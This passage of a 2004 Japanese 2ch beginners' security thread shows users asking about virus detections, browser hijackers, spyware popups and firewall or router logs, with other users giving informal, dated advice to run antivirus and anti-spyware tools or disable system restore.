あと---ってウイルスがどこに感染していたかもう一度調べるべきですか?

聞いてばかりで申し訳ないです。解決の兆しが見えてきた様なので大分安心できました。
本当にありがとうございます。ではまた少ししたらここに来ますので。

858 :名無しさん@お腹いっぱい。:04/06/25 01:03
ノートンセキュリティ2004使っています。
たまにネットでサイトを開こうとすると「runtime error」というのが
出てきた後ネットが完全に遮断されます。
再起動かけたら、繋がるのですけど。
これって仕方の無いことなんですか?

859 :名無しさん@お腹いっぱい。:04/06/25 01:13
>>854
ありがとうございました。
確かに説明できないですね(笑
治ったのですが一つ疑問が・・・
何故セーフモードにするといけるのでしょうか?
このモードの意味って何?

860 :名無しさん@お腹いっぱい。:04/06/25 01:23
>>858
残念だけどnortonの仕様だから仕方ないこと。

861 :858:04/06/25 01:57
>>860
( ゚д゚)ポカーン マジでつか…
どうも、ありがとう御座いました。

862 :名無しさん@お腹いっぱい。:04/06/25 02:12
>>857

できるだけ詳しいほうが答えやすいしね、情報すくないと
予想でしか直し方いえなくなるからね

863 :名無しさん@お腹いっぱい。:04/06/25 02:14
>>858

いろんな理由でruntime errorおこるから、なんともいえない。
http://www.itmedia.co.jp/dict/software/architecture/03424.html

864 :名無しさん@お腹いっぱい。:04/06/25 02:19
>>851

こいうもんだとおもうよ、読んでみ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=VBS_LOVELETTER-O&VSect=T
http://www.trendmicro.com/jp/about/news/pr/archive/2000/news000505.htm

865 :名無しさん@お腹いっぱい。:04/06/25 03:43
ネットにつなぐと、システムプロセス'C\WINDOWS\system32lsass.exe'は状態コード-1073741819で終了されましたとなってシャットダウンしてしまうのですが。CPUをみると100%稼働状態です。ウィルスでしょうか?

866 :名無しさん@お腹いっぱい。:04/06/25 05:07
>>865

ウィルスみたいです。ここで解説してる人がいるけど。
http://oshiete1.goo.ne.jp/kotaeru.php3?q=847192

867 :名無しさん@お腹いっぱい。:04/06/25 05:49
IEを開くとTroian Bytev virty こんな感じのウイルスが検出されまくって
Ferr Pornとかいうサイトが勝手に開くんですが・・・。

868 :名無しさん@お腹いっぱい。:04/06/25 06:04
>>867

ウィルス駆除ソフトで取り除いて。ブラウザハイジャッカーも
あるみたいだけど。スパイウェア駆除もやっておけばほぼ
だいじょぶしょ。


869 :名無しさん@お腹いっぱい。:04/06/25 07:00
>>866
すみません。ありがとうございます。

870 :ひで:04/06/25 11:03
コンピュータの管理のセキュリティを見たら
NT AUTHORITY\ANONYMOUS LOGON ID538 ってのがあったんですが
これって誰かに勝手に入られてるって事なんでしょうか????


871 :名無しさん@お腹いっぱい。:04/06/25 11:28
>>870
マルチうざい、以上。

872 :682:04/06/25 11:52
>>862
わかりました。では皆様お願いします。
もう一度調べてみました。隔離されたウイルスはどうやら検出されないみたいですね。7つ見つかりました。

ウイルス名  BKDR_HACDEF.E  
ファイル名  A0309110.CPY(C;\_RESTORE\ARCHIVE\FS1331.CAB)
        A0309137.CPY(C;\_RESTORE\ARCHIVE\FS1333.CAB)から
        A0309142.CPY(C;\_RESTORE\ARCHIVE\FS1333.CAB)最初の数字の列、下2桁42まで連続であります。(0309137〜0309142)の6つです。
また37から42まではカッコの中の数字も違ってます。1331が一つ、連続した6つが1333です。

そしてもう一つのウイルスが
ウイルス名  ---
ファイル名      C;\_RESTORE\ARCHIVE\FS1331.CAB  
同じウイルスで   C;\_RESTORE\ARCHIVE\FS1333.CAB  

の2つ出てきました。以上の7点です。
---ウイルスなどが問題ないようでしたらアドバイス通り対処してみたいと思っております。

あとこのウイルスはオフラインでやる限りは問題ないウイルスなのでしょうか?
よろしくお願いします。

873 :名無しさん@お腹いっぱい。:04/06/25 12:05
>>872
>>747にもあるようにRESTOREはMEの復元データですよ。「システムの復元を
しない」を一度選択すれば復元ポイントが消え、ともに蓄えられているデータ
も消えるはず。その上でスキャンすれば解決でしょう。

874 :名無しさん@お腹いっぱい。:04/06/25 12:28
>>872
え〜っと私も以前感染して削除したにも関わらずAVGが感染警告を出すので
調べてみましたら、あなたと同じでした(OSはxpですが)。
システムの復元ポイントの削除で解決しました。システムの復元データの
削除は、そんなに気にしなくても良いと思います。
むしろ「穢れた過去は」消し去った方がいいのでは?(笑)

875 :名無しさん@お腹いっぱい。:04/06/25 13:02
>>870

バックドア型ウィルスにやられてるかも、ウィルスチェック
したほうがいいです。できれば、ネットと接続切って。


876 :682:04/06/25 13:29
自分の過去レス702のオンラインウイルススキャンで出た
>c:\_RESTORE\TEMP\A0309144.CPY は Backdoor.Ranky に感染しています。
これはインストールしたウイルスバスターでは検出されませんでした、しかしRESTOREだからどの道システムの復元で消せそうですね。

>c:\WINDOWS\Application Data\svhost.exe は Backdoor.HackDefender に感染しています。
これは隔離できました。違うウイルスのTROJ_SMALL.FOも隔離できました。 
---ってウイルスもRESTOREに感染していたのでこれも消せそうですね。

多分もうウイルスとかないと思うのでまず、システムの復元を無効にしてから、
バスターをアップデートして全検索をかけて問題なければ解決ですか?

>>873
ありがとうございます、このウイルスはなに経由で感染したのですかね?
メールとかはあまり利用しないので・・・多分何かをダウンロードした時とかだと思うのですが・・・
それか不正アクセスされる恐れがあるウイルスらしいので、自分に悪意を持っている誰かの仕業とかもありえるのですか?
もしそうだとしたら凄く怖いです・・あまり心当たりはないですけど。

>>874
>むしろ「穢れた過去は」消し去った方がいいのでは?(笑)
これはどの様な意味でしょうか?・・・アダルトサイトから感染するウイルスとかでしょうか?w
感染している時なにかされてたかも知れないと考えると凄い怖いです・・

877 :名無しさん@お腹いっぱい。:04/06/25 14:33
>>876
セキュリティソフトでシールド張ってないんだろ?
ウェブペーシを表示しただけでも感染するし、ダウンロードしたファイルに入っていて、
ソフトのインストールをした時に、感染したとも考えられる。
メールの添付ファイルを開かなければ、感染しないと思っていたの?
いゃ、おめでたいなあ。
セキュリティパッチは全部当てておかないと、ウェブページは危険だからね。
金儲けのために、至る所に罠が張ってある。
対策ソフトがスルーしたら終わりなんだから。

878 :名無しさん@お腹いっぱい。:04/06/25 14:53
>>877
お前、何が言いたいんだ?

879 :名無しさん@お腹いっぱい。:04/06/25 14:59
>>878
書いてある通りだと思うぞ。

880 :名無しさん@お腹いっぱい。:04/06/25 15:08
>>876
>アダルトサイトから感染するウイルスとかでしょうか?w
いやいや、そのような意味ではありません。お気に触ったらお許しを。
なにか復元データを大事になさっていたように見受けられましたので。
いっそ処分処分♪でいいのでは?

ウイルスはセキュリティシールドを張っていないと何故感染したか解らないものです。
その都度解るようじゃなにもアンチウイルスソフトなんか要らないです。
(それでもあるは程度解りますが・・)
汚染されたthmlは踏んだ途端に感染しますし、OEでは物によっては開いた瞬間に感染します。
特に丸腰でのWebTravelは危険です。たとえアダルトサイトなんかに行かなくてもです。

アンチウイルス、スパイウェア対策ソフト、ファイアウォール、この三種の神器で
参りましょう。

881 :名無しさん@お腹いっぱい。:04/06/25 15:10
thml→htmlです。

882 :845:04/06/25 15:37
…っで結局誰か
wuadsff.exe
って何なのか知りたいので教えて下さい

883 :名無しさん@お腹いっぱい。:04/06/25 15:54
>>882

ウィルスらしいけど、いまのとこそれについて情報なし。
なにしろ一日400個もウィルスつくられてるんで。

884 :名無しさん@お腹いっぱい。:04/06/25 16:45
>>882

外国サイトもくぐったけど、スペイン語で書かれてる掲示板にその
ファイル名あったけど。W32.Gaobot.YCらしい、ということだけ。
それの新型かなにか。書いてあったアドバイスも読んでみたけど
「1メガ以下なら、下に書いたURLで検索してみて」とか
「ファイアーウォールやっといたほうがいい」とか、そんな事しか
かいてなかったな。


http://babelfish.altavista.com/babelfish/trurl_pagecontent?lp=es_en&url=http%3a%2f%2fwww.kaspersky.com%2fscanforvirus.html

885 : :04/06/25 18:25
firewallって入れといたほうがいいんけ?

886 :名無しさん@お腹いっぱい。:04/06/25 18:43
>>885
入れといたほうがいい。フリー版で優秀なのがあるから
専用スレ検索してみれ

Zone Alarm
Outpost

887 :名無しさん@お腹いっぱい。:04/06/25 19:44
ファイァウォールの
ログファイルを開こうとすると、
共有違反という警告が出て開けないんですが、
どうしたら見れますか?


888 :名無しさん@お腹いっぱい。:04/06/25 19:50
>>887
そのログファイルに、アクセス権が無いんでしょうね。
ユーザーに与えればいいのか、システムなのかは、わかりませんけどね。

889 :名無しさん@お腹いっぱい。:04/06/25 20:56
すいません、緊急の質問なんですが
トロイを駆除できるトロイ専門の良いツールを教えてもらいたいのです。
どうかよろしくお願いします。

890 :名無しさん@お腹いっぱい。:04/06/25 21:06
>>889

トロイ専門ってのは、しらないな。ノートンでもバスターでも
対応してるんで、ためしてみたら。


891 :名無しさん@お腹いっぱい。:04/06/25 21:07
>>889
テンプレにツールの紹介があるよ。
☆☆トロイの木馬☆☆2台目
http://pc5.2ch.net/test/read.cgi/sec/1087290865/

892 :名無しさん@お腹いっぱい。:04/06/25 21:08
>>890-891
りがあとうござまいす!
早速行って参ります!

893 :名無しさん@お腹いっぱい。:04/06/25 21:14
>>888
おとといまで見れてました。
昨日からいきなり見れなくなりました

894 :名無しさん@お腹いっぱい。:04/06/25 21:17
>>893
環境は、突然変わるものなのです。
アクセス権を確認してみたら?

895 :名無しさん@お腹いっぱい。:04/06/25 21:24
>>893
マルチ&単発質問スレ立てちゃだめよん。削除依頼出しておいて下さい。
http://pc5.2ch.net/test/read.cgi/sec/1088082201/l50

896 :名無しさん@お腹いっぱい。:04/06/25 21:25
たすけてください
Win2000 で回線はYBB、ルータを使ってます
ブラウザはIE6です
スパイウェアにひっかかってしましました
AD-AWARE ,Spybot を最新にアップデート後
それぞれ検索し修正したのですが 直りません…
何か他に方法いい方法などありますでしょうか?

IEを起動するといつも 英語でなにやらスパイウェアにかかってるので
今すぐ駆除のソフトを無料でダウンロードしよう みたいな怪しいのが
ポップアップしております

お助けください。




897 :名無しさん@お腹いっぱい。:04/06/25 21:25
>>834
了解しました。
今いきなりカーソルが点滅しまくって、
ウインドウが勝手に開きまくって
ビビりました

898 :名無しさん@お腹いっぱい。:04/06/25 21:28
よくFreeのアンチウィルスソフトウェアは更新が遅いといわれますが、avastなどのように商用版と無料版が分かれているものでも定義ファイルの公開は遅れるのでしょうか?

899 :名無しさん@お腹いっぱい。:04/06/25 21:31
こりゃ、初心者レベルでは、悪質スパイウェアは、駆除出来ねえな。
一度に、何種類も最近のはインストールされるんだね。

900 :名無しさん@お腹いっぱい。:04/06/25 21:35
http://www14.smutserver.com/anime/piss/2002.04/05.html
これみたら背景とかおかしくなって直らないんですが…
バスターも掛けましたが直りませんどうすればいいでしょうか?

901 :名無しさん@お腹いっぱい。:04/06/25 21:45
ウイルス感染したとかおかしくなったページを直リンするような軽率な人には
アドバイスしたくないです。よって、リンク先も見ませんw

902 :名無しさん@お腹いっぱい。:04/06/25 21:45
当方環境はWINXP・IE6・YBB・ウイルスバスター2004です。
これで匿名串を刺し、ソース先取りソフト(ブラクラうまえの杖等)でアクセスし
ソフト内に表示されたソースを読んだ状態ではCGIアクセス解析にはかからないでしょうか?
相手は知識があり、サイトはは自宅鯖にて運営している模様です。
また、このような場合は調べたら上記のようなアクセスでもログは残ってしまうのでしょうか?
それにはどのような内容まで分かるのでしょうか?

参考:ソース先取りソフトにて得たソースをそのままでは読みづらいので
フロントページにコピペしてサイト構成を再現したところ、
勝手にそこで使用しているバナーや画像を読み込み始めたので慌てました。
このようなブラウザ以外からの接続は相手方にはどんなログとして残るのでしょうか?

稚拙な質問大変恐縮ですがどうかお教えください。


903 :900:04/06/25 21:51
すいません軽率でした
なんとかアドバイスもらえませんか?
お願いします

904 :名無しさん@お腹いっぱい。:04/06/25 21:53
大手メーカーの市販のファイアウォールよりKerioなどのファイアウォールのほうが高機能っていうことはあるのでしょうか?
最近Nortonの重さが気になってるんですが・・・

905 :名無しさん@お腹いっぱい。:04/06/25 21:57
>>904
それは、付加機能が多いからでしょ。
カスタマイズすればいいっしょ。

906 :名無しさん@お腹いっぱい。:04/06/25 21:58
>>903
ttp://haiiro.info/my/text/template.html

ここに書いてあるような基本はやりましたか?

907 :名無しさん@お腹いっぱい。:04/06/25 22:06
>>906
Detected SPYware!
とか窓に出てくる場合どれを見ればいいですか?
黄色い窓はでないし…

908 :名無しさん@お腹いっぱい。:04/06/25 22:10
>>907
とりあえず、応急処置の部分はやりました?

909 :名無しさん@お腹いっぱい。:04/06/25 22:20
>>908
今進行中です
ありがとうございます
まじ感謝です出来るとこまでがんばります
なにせ初めてで…半泣きでやってます

910 :896:04/06/25 22:23
なんとか直りました

原因は COOL WEB SERCH のようで
シュレッダーで直すことができました

ありがとうございました

911 :名無しさん@お腹いっぱい。:04/06/25 22:31
OS再起動とは何ですか?

912 :名無しさん@お腹いっぱい。:04/06/25 22:34
>>911
OSと再起動のどっちが分からないのかな。

913 :名無しさん@お腹いっぱい。:04/06/25 22:39
>>896

俺のとこもでたよ、英語でスパイウェア駆除ソフトおとせって。
とりあえず、バスターとかノートンでウィルスチェックもやってみて。



914 :名無しさん@お腹いっぱい。:04/06/25 22:41
>>900

コントロールパネルの画面のとこで、背景なおせます。
spybot、 ad awareなどでスパイウェア駆除もやってみましょう。


915 :名無しさん@お腹いっぱい。:04/06/25 22:45
>>914 助かります やってみます(泣

916 :名無しさん@お腹いっぱい。:04/06/25 22:53
>>914 コントロールパネルのどれで直せるんでしょうか?

917 :902:04/06/25 22:55
すみません、スレ違いですかね?やっぱり。
どのスレに行けば回答が得られやすいでしょう?


918 :名無しさん@お腹いっぱい。:04/06/25 22:56
>>916
Xpなら「画面」から「デスクトップ」で「背景」で選択。

919 :名無しさん@お腹いっぱい。:04/06/25 23:02
>>918
直りませんでした…
駆除しないと直らないんですね。。。

920 :名無しさん@お腹いっぱい。:04/06/25 23:03
>>902
>フロントページにコピペしてサイト構成を再現したところ、
>勝手にそこで使用しているバナーや画像を読み込み始めた

この時点でヤバイかもしれませんね。
「ブラウザ不明」で残るのかもしれません。
うちの所にもたまに「ブラウザ不明」の接続があります。

921 :名無しさん@お腹いっぱい。:04/06/25 23:04
>>919
画面直すのは最後の最後ですよ。
他のやることをやってからの方が良いです。

922 :名無しさん@お腹いっぱい。:04/06/25 23:08
>>917
どのスレにと言うよりも自分でも稚拙と言っている通り、
質問は整理して読む立場で書く練習した方がいいかも。

923 :名無しさん@お腹いっぱい。:04/06/25 23:08
>>921
スパイウェアの削除ソフト入れたいんですが
ウイルスバスターは喧嘩しませんよね?

924 :名無しさん@お腹いっぱい。:04/06/25 23:09
>>923
喧嘩ねえ。言いたい事はなんとなく分かるが。

925 :名無しさん@お腹いっぱい。:04/06/25 23:10
>>923
保証はできませんが、たぶん大丈夫です。
うちでは大丈夫でした。

926 :名無しさん@お腹いっぱい。:04/06/25 23:11
>>924
間違ってますか?すいません

927 :名無しさん@お腹いっぱい。:04/06/25 23:15
>>926
何を間違ってるかといえば、怪しいサイトには不用心にアクセス
するのに、駆除ソフトを使うことに妙に警戒してるところです。

928 :名無しさん@お腹いっぱい。:04/06/25 23:31
いや喧嘩してインターネットが動かなくなるって書いてあったんで 本当に不用意でした…

929 :名無しさん@お腹いっぱい。:04/06/25 23:39
インターネットが動かなくなるねえ。表現が独特だよね。

930 :名無しさん@お腹いっぱい。:04/06/25 23:42
>>928
ウイルスバスターじゃなくて、ウイルスセキュリティと間違えてない?
ウイルスセキュリティがスパイウェア駆除ソフトのSpybot S&D と相性が悪いのは、販売元が認めてる。
ウイルスバスターとスパイウェア駆除ソフト(Ad-awareとSpybot S&D)使ってるけど、不具合は起きてない。

931 :名無しさん@お腹いっぱい。:04/06/25 23:52
>インターネットが動かなくなる。
ホント、表現が独特で好感が持てる。
もしかして、インターネッティンガーさんかな? (^O^)

932 :名無しさん@お腹いっぱい。:04/06/25 23:54
真面目にテンプレ読んだら、そう言う聞き方にはならないもんね。

933 :名無しさん@お腹いっぱい。:04/06/26 00:09
助けて状態とはなんなんでしょうか?

934 :名無しさん@お腹いっぱい。:04/06/26 00:11
言いたい事も言えないこんな世の中じゃ

935 :名無しさん@お腹いっぱい。:04/06/26 00:12
>>933
助けてと状態のどちらが分からないのですか?

936 :名無しさん@お腹いっぱい。:04/06/26 00:22
助けてです

937 :名無しさん@お腹いっぱい。:04/06/26 00:25
>>936
テンプレと国語辞典と935のメール欄は見といてください。

938 :名無しさん@お腹いっぱい。:04/06/26 00:25
>>934 poison

browser hijacker ni nottorare, nanka IME sura kidousimasen.
trendmicro de scan site, hikkakattano wo nekosogi sakujo,
rejisutori mo touzen sakujo, Ad-aware de safe-mode de remove simasitaga,
IE wo tachi ageru tabini process ni xxx.exe toiu waruikotositesouna mono ga detekimasu.

to omottara nanka naottamitai? "hijackthis" manse- o(^-^)o <=mukatukukaomoji

IME ga imadani ugokaneeyo orz

939 :名無しさん@お腹いっぱい。:04/06/26 00:41
>>916

”画面”です、背景のタブのとこで設定できます。

940 :名無しさん@お腹いっぱい。:04/06/26 00:46
愛の鞭がとんでいるなー。

えーっと、あわてず騒がず、テンプレを読みましょう>お困りの皆さん。

941 :名無しさん@お腹いっぱい。:04/06/26 01:33
>>938
rejisutori???registry daro?

942 :名無しさん@お腹いっぱい。:04/06/26 01:58
なにか古そうなことですみません。
Generic Host Process for Win32 Servicesのアクセスを遮断しっぱなしにしているのですが
問題ないのでしょうか?

943 :名無しさん@お腹いっぱい。:04/06/26 02:08
最近McAfee等の自動アップデートがうまくいかなかったりします。
加えてIEだとブラウザが繋がらず、DonutPではネットに繋がる変な状況になっています。
どのようにして戻したらいいのでしょうか?

944 :名無しさん@お腹いっぱい。:04/06/26 03:41
PCを起動すると「180 Search Assisitant Alert」
というダイアログが出て、インストロールしますか?
見たいな警告が出ます。

どう対処すればいいんでしょうか。

945 :名無しさん@お腹いっぱい。:04/06/26 04:02
手動で削除する方法などが、
パソコンの仕組みをまったく知らないので
訳が分からなくなります・・・
場所なんかも意味が分からない・・・

超初心者でも分かりやすいパソコンの「仕組み」「呼び名」を説明しているお勧めサイトなど
どなたかご存知ありませんでしょうか?
これから付き合っていくためにも、超苦手な分野ですが、勉強していこうと思うのです・・・

946 :名無しさん@お腹いっぱい。:04/06/26 04:12
WinXPSP1,IE6SP1使用
ネット上でトロイを踏んでしまったがAVGにて隔離、削除済。
その後2ソースにてウィルスチェック(AVG + オンラインスキャン)するがウィルス確認できず。

という状態なのですがインターネットオプションのホームが強制的にabout:blankになってしまいます。
インターネット一時ファイル 削除済。履歴のクリア済です。どうしたら以前のように自分の指定したページ
を指定できるのるようになるでしょうか


947 :名無しさん@お腹いっぱい。:04/06/26 04:17
>>942-944

OSその他の環境がわからないんで、なんともいえねえ。
サポートに電話してみたら?なかなかつながらないけど
しつこくかけてればつながるよ。シリアル番号きかれるん
でメモっとくといい、PC本体の後ろか、保証書に書いて
あるよ。







948 :名無しさん@お腹いっぱい。:04/06/26 04:19
>>945

まず最初に買ったときついてる取扱説明書を読むことだよ。
ある程度の事しってないと、サイトみてもわからないと思うよ。


949 :名無しさん@お腹いっぱい。:04/06/26 04:20
>>946

コントロールパネル−インターネットオプションのとこで
できます。

950 :946:04/06/26 04:30
コントロールパネル→インタネットオプションにてホームを指定。
IE再起動でabaut:blankになってしまいます。

いまギコナビにて閲覧しているのですが、ギコナビ起動直後のスレッド表示画面にも
IEのホームで強制的に表示されているabout:blnkの頁が表示するのです、どうしたらよろしいでしょうか。

951 :名無しさん@お腹いっぱい。:04/06/26 05:05
ウィルスバスターのファイアウォールのログを見ましたら、
同じプロバイダーの奴のIPがいっぱい載ってました。
これは、不正アクセスとみなしても良いですか?


952 :名無しさん@お腹いっぱい。:04/06/26 05:41
>947
そのオチだと、このスレの存在意義が・・・。

953 :名無しさん@お腹いっぱい。:04/06/26 05:52
>>950

ウィルスですVBS loveletterでしょうおそらく。ウィルス駆除
ソフトで除いてください。オンラインスキャンでもだいじょぶ
とおもうけど、ヒットしたウィルスを削除すれば

http://www.trendmicro.co.jp/hcall/index.asp


954 :名無しさん@お腹いっぱい。:04/06/26 07:18
>>952
このスレは「セキュリティ初心者」が対象で「PC初心者」が対象ではない。

955 :名無しさん@お腹いっぱい。:04/06/26 07:31
>>950
とっととリカバリーしろよ。
このタコ助がっ

956 :名無しさん@お腹いっぱい。:04/06/26 09:06
http://77483.org/upload/source/77483_0238.png

957 :名無しさん@お腹いっぱい。:04/06/26 10:51
ある日PCを数分放置して戻ったらレジストリが破壊されてました。
IE6の窓はいくつか開いてましたが動かしてたのはネトゲくらいです。
これってアタックされてる可能性あります?OSはMeです。

958 :名無しさん@お腹いっぱい。:04/06/26 11:03
PFW,もしくはルーターのログは?

959 :名無しさん@お腹いっぱい。:04/06/26 11:17
不親切なところですね

960 :957:04/06/26 11:22
>>958
一応ルータのログを残ってる範囲で
2004年6月日 2:55:34 Unrecognized access from 218.63.187.165:4020 to TCP port 445
2004年6月日 2:55:37 Unrecognized access from 218.63.187.165:4020 to TCP port 445
2004年6月日 2:55:43 Unrecognized access from 218.63.187.165:4020 to TCP port 445
2004年6月日 2:56:21 Unrecognized access from 61.193.100.153:4046 to TCP port 135
2004年6月日 2:56:24 Unrecognized access from 61.193.100.153:4046 to TCP port 135
2004年6月日 2:56:30 Unrecognized access from 62.83.252.195:1658 to TCP port 445
2004年6月日 2:56:31 Unrecognized access from 62.83.252.195:1658 to TCP port 445
2004年6月日 2:56:38 Unrecognized access from 62.83.252.195:1658 to TCP port 445
2004年6月日 2:57:21 Unrecognized access from 61.191.154.107:3411 to TCP port 445
2004年6月日 2:57:24 Unrecognized access from 61.191.154.107:3411 to TCP port 445
2004年6月日 2:57:49 Unrecognized access from 61.193.64.6:3119 to TCP port 445
2004年6月日 3:01:08 Unrecognized access from 217.165.192.91:1418 to TCP port 445
2004年6月日 3:03:40 Unrecognized access from 204.117.93.38:2178 to TCP port 445
2004年6月日 3:03:42 Unrecognized access from 61.193.55.45:1627 to TCP port 445
2004年6月日 3:03:43 Unrecognized access from 204.117.93.38:2178 to TCP port 445
2004年6月日 3:03:45 Unrecognized access from 61.193.55.45:1627 to TCP port 445
2004年6月日 3:03:49 Unrecognized access from 204.117.93.38:2178 to TCP port 445
2004年6月日 3:04:06 Unrecognized access from 24.82.14.184:2596 to TCP port 445
2004年6月日 3:04:09 Unrecognized access from 24.82.14.184:2596 to TCP port 445
2004年6月日 3:04:15 Unrecognized access from 24.82.14.184:2596 to TCP port 445

961 :957続き2:04/06/26 11:25
2004年6月日 3:05:54 Unrecognized access from 62.72.225.123:4558 to TCP port 445
2004年6月日 3:06:08 Unrecognized access from 200.175.17.238:1549 to TCP port 445
2004年6月日 3:06:33 Unrecognized access from 211.119.118.227:4796 to TCP port 445
2004年6月日 3:06:36 Unrecognized access from 211.119.118.227:4796 to TCP port 445
2004年6月日 3:06:42 Unrecognized access from 211.119.118.227:4796 to TCP port 445
2004年6月日 3:07:21 Unrecognized access from 61.192.102.53:3965 to TCP port 445
2004年6月日 3:07:24 Unrecognized access from 61.192.102.53:3965 to TCP port 445
2004年6月日 3:08:10 Unrecognized access from 63.154.4.46:3851 to TCP port 135
2004年6月日 3:08:39 Unrecognized access from 68.154.8.71:4865 to TCP port 445
2004年6月日 3:08:42 Unrecognized access from 68.154.8.71:4865 to TCP port 445
2004年6月日 3:08:48 Unrecognized access from 68.154.8.71:4865 to TCP port 445
2004年6月日 3:08:53 Unrecognized access from 220.192.126.48:4677 to TCP port 445
2004年6月日 3:08:55 Unrecognized access from 220.192.126.48:4677 to TCP port 445
2004年6月日 3:09:01 Unrecognized access from 220.192.126.48:4677 to TCP port 445
2004年6月日 3:09:05 Unrecognized access from 129.44.181.45:4777 to TCP port 445
2004年6月日 3:09:30 Unrecognized access from 68.122.126.120:1027 to UDP port 137
2004年6月日 3:09:47 Unrecognized access from 4.65.100.156:2053 to TCP port 445
2004年6月日 3:09:57 Unrecognized access from 4.65.100.156:2053 to TCP port 445
2004年6月日 3:10:32 Unrecognized access from 61.79.208.213:1451 to TCP port 1025

962 :957続き3:04/06/26 11:27
2004年6月日 3:05:54 Unrecognized access from 62.72.225.123:4558 to TCP port 445
2004年6月日 3:06:08 Unrecognized access from 200.175.17.238:1549 to TCP port 445
2004年6月日 3:06:33 Unrecognized access from 211.119.118.227:4796 to TCP port 445
2004年6月日 3:06:36 Unrecognized access from 211.119.118.227:4796 to TCP port 445
2004年6月日 3:06:42 Unrecognized access from 211.119.118.227:4796 to TCP port 445
2004年6月日 3:07:21 Unrecognized access from 61.192.102.53:3965 to TCP port 445
2004年6月日 3:07:24 Unrecognized access from 61.192.102.53:3965 to TCP port 445
2004年6月日 3:08:10 Unrecognized access from 63.154.4.46:3851 to TCP port 135
2004年6月日 3:08:39 Unrecognized access from 68.154.8.71:4865 to TCP port 445
2004年6月日 3:08:42 Unrecognized access from 68.154.8.71:4865 to TCP port 445
2004年6月日 3:08:48 Unrecognized access from 68.154.8.71:4865 to TCP port 445
2004年6月日 3:08:53 Unrecognized access from 220.192.126.48:4677 to TCP port 445
2004年6月日 3:08:55 Unrecognized access from 220.192.126.48:4677 to TCP port 445
2004年6月日 3:09:01 Unrecognized access from 220.192.126.48:4677 to TCP port 445
2004年6月日 3:09:05 Unrecognized access from 129.44.181.45:4777 to TCP port 445
2004年6月日 3:09:30 Unrecognized access from 68.122.126.120:1027 to UDP port 137
2004年6月日 3:09:47 Unrecognized access from 4.65.100.156:2053 to TCP port 445
2004年6月日 3:09:57 Unrecognized access from 4.65.100.156:2053 to TCP port 445
2004年6月日 3:10:32 Unrecognized access from 61.79.208.213:1451 to TCP port 1025

963 :957続き4:04/06/26 11:28
2004年6月日 3:14:41 Unrecognized access from 67.154.207.56:1285 to TCP port 445
2004年6月日 3:14:44 Unrecognized access from 67.154.207.56:1285 to TCP port 445
2004年6月日 3:14:50 Unrecognized access from 67.154.207.56:1285 to TCP port 445
2004年6月日 3:16:14 Unrecognized access from 61.193.60.70:3974 to TCP port 445
2004年6月日 3:16:17 Unrecognized access from 61.193.60.70:3974 to TCP port 445
2004年6月日 3:16:23 Unrecognized access from 61.193.60.70:3974 to TCP port 445
2004年6月日 3:16:46 Unrecognized access from 205.158.160.209:45903 to TCP port 445
2004年6月日 3:16:49 Unrecognized access from 205.158.160.209:45903 to TCP port 445
2004年6月日 3:16:55 Unrecognized access from 205.158.160.209:45903 to TCP port 445
2004年6月日 3:17:07 Unrecognized access from 61.193.106.188:2688 to TCP port 445
2004年6月日 3:17:10 Unrecognized access from 61.193.106.188:2688 to TCP port 445
2004年6月日 3:17:11 Unrecognized access from 61.193.13.21:4025 to TCP port 445
2004年6月日 3:18:02 Unrecognized access from 61.193.43.201:3011 to TCP port 445
2004年6月日 3:18:04 Unrecognized access from 217.205.154.58:3442 to TCP port 135
2004年6月日 3:18:05 Unrecognized access from 61.193.43.201:3011 to TCP port 445
2004年6月日 3:18:07 Unrecognized access from 217.205.154.58:3442 to TCP port 135
2004年6月日 3:18:13 Unrecognized access from 217.205.154.58:3442 to TCP port 135
2004年6月日 3:21:45 Unrecognized access from 61.92.203.185:2918 to TCP port 80
2004年6月日 3:21:48 Unrecognized access from 61.92.203.185:2918 to TCP port 80

964 :957続き5:04/06/26 11:29
2004年6月日 3:21:54 Unrecognized access from 61.92.203.185:2918 to TCP port 80
2004年6月日 3:24:34 Unrecognized access from 81.89.10.15:2035 to TCP port 445
2004年6月日 3:24:37 Unrecognized access from 81.89.10.15:2035 to TCP port 445
2004年6月日 3:24:43 Unrecognized access from 81.89.10.15:2035 to TCP port 445
2004年6月日 3:25:36 Unrecognized access from 212.241.101.196:1331 to TCP port 445
2004年6月日 3:27:14 Unrecognized access from 61.193.106.188:3383 to TCP port 445
2004年6月日 3:27:17 Unrecognized access from 61.193.106.188:3383 to TCP port 445
2004年6月日 3:27:59 Unrecognized access from 213.22.139.43:4107 to TCP port 445
2004年6月日 3:28:05 Unrecognized access from 213.22.139.43:4107 to TCP port 4

貼ってみると長いですね(;´Д`)ごめんなさい

965 :名無しさん@お腹いっぱい。:04/06/26 11:30
regeditは見れる?

966 :957:04/06/26 11:33
regeditのどこを見ればいいですか?

967 :名無しさん@お腹いっぱい。:04/06/26 11:38
見れるならウィルスじゃないか・・・破壊ってどんな感じ?

968 :957:04/06/26 11:44
>>967
「C:ドライブに書き込みできませんファイルが壊れている可能性があります」
みたいな感じで画面が切り替わって警告が出ました。何度か出るとフリーズ。
しばらく何度再起動してもその状態が続いたのでやばいかと思いましたが、
何回か再起動するうちにレジストリ修復のウィンドウが出て修復すると直りました。
なので今のところPC使う分には問題ないんですが原因不明なのが気持ち悪くて。

969 :名無しさん@お腹いっぱい。:04/06/26 12:35
同じような状況になったことがある。ファイルが削除されてたり、
変なファイルが作られてたりすればウィルスだと思う。
リカバリしたほうが・・・

970 :名無しさん@お腹いっぱい。:04/06/26 12:43
>>4のブラウザのOperaの日本語の公式HPで落とせるものと
その下にあるOpera日本語ファイルってのは何ガ違うんですか?

971 :テンプレ案:04/06/26 12:50
インターネットとパソコンのセキュリティ関係の初心者質問スレです。

★━ 質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ OSの種類(必須)、ブラウザ、セキュ関係ソフトの有無、やってみたこと等できる
   だけ詳しく報告。(例)「WinXPSP1,IE6SP1使用。ADSL回線でプロバイダは〜
   〜のルータを導入しているが、〜ができなくなった」等
 ・ 2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。
 ・ マルチポスト(他スレ、他サイトとの同時質問)禁止。他スレから誘導された場合は、
   その旨書くこと。
 ・ 違法な話題や質問(WinMX、Winny、エミュレータ等)は禁止です。
 ・ 薮パソユーザーは立ち入り禁止。HNを変えてもダメです。

《参考》
・ウィルスにやられた→ウィルス情報&質問 総合スレッド☆Part21
  http://pc5.2ch.net/test/read.cgi/sec/1087695514/
・IEが乗っ取られて変になった↓
